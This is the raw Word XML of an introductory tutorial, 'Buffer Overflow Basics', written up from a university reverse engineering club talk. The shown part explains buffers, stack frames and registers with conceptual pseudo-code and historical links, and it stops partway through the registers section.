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98E6E4" w14:textId="7C81AC78" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5D7E7BFA" w14:textId="109E6BC4" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">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247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Buffer Overflow Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5866FCBC" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAAD1D" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buffer overflows were an earth-shattering vulnerability exploited in the late 1980’s that are protected against on modern systems. That said, they are still relevant, and pave the way to learning more advanced exploits. I gave a buffer overflow presentation and live demonstration to my University’s Reverse Engineering club, so I thought I would convert it to article form and provide downloads so others can have the resources and knowledge to do this themselves. If you would like to read up on more history of the buffer overflow, here are a few informative links:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFEBD5" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the first articles written on the topic: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00247450">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>phrack</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00247450">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve"> magazine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> written by Aleph1, the hacker part of the group </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00247450">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>r00t</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> who made the shellcode we will use.</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId7" w:anchor="History" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00247450">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Wikipedia</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B9709FF" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This vulnerable program is implemented in C++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C674E46" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>What is a buffer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232AB70" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Arrays allocate storage space in what is called a </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE794F1" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Syntax: </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type array[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>buffer_length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49D6AB" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex: </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>50]; // An array of up to 50 characters.</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Variable = input [49] // max</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Variable = input [250] // accessing memory outside the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD24EE" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>The Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353E8AE4" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">All variables are stored in RAM allocated per-program in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stack frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B630ACB" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A1EFE7" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fxn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D48D0" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>array[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">50]  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5F0984" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return // overwritten  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FCB80A" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D1C1E" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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89C857E" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B9D709" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  var1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7B712D" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fxn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB19D65" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F00190" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E1224CC" wp14:editId="391A59D0">
            <wp:extent cx="1943100" cy="3930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3100" cy="3930650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F78AAEF" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13426074" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EBP: Extended Base Pointer</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>- Points to base of the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747AFC82" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
